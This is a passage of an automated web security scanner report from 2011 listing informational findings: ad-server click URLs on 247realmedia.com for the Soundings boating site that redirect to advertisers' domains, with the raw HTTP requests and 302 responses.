Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.493. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.494. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.495. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.496. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:26:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.497. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.498. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:22:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:33:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:56 GMT
Server: Apache/2.0.52 (Red Hat)
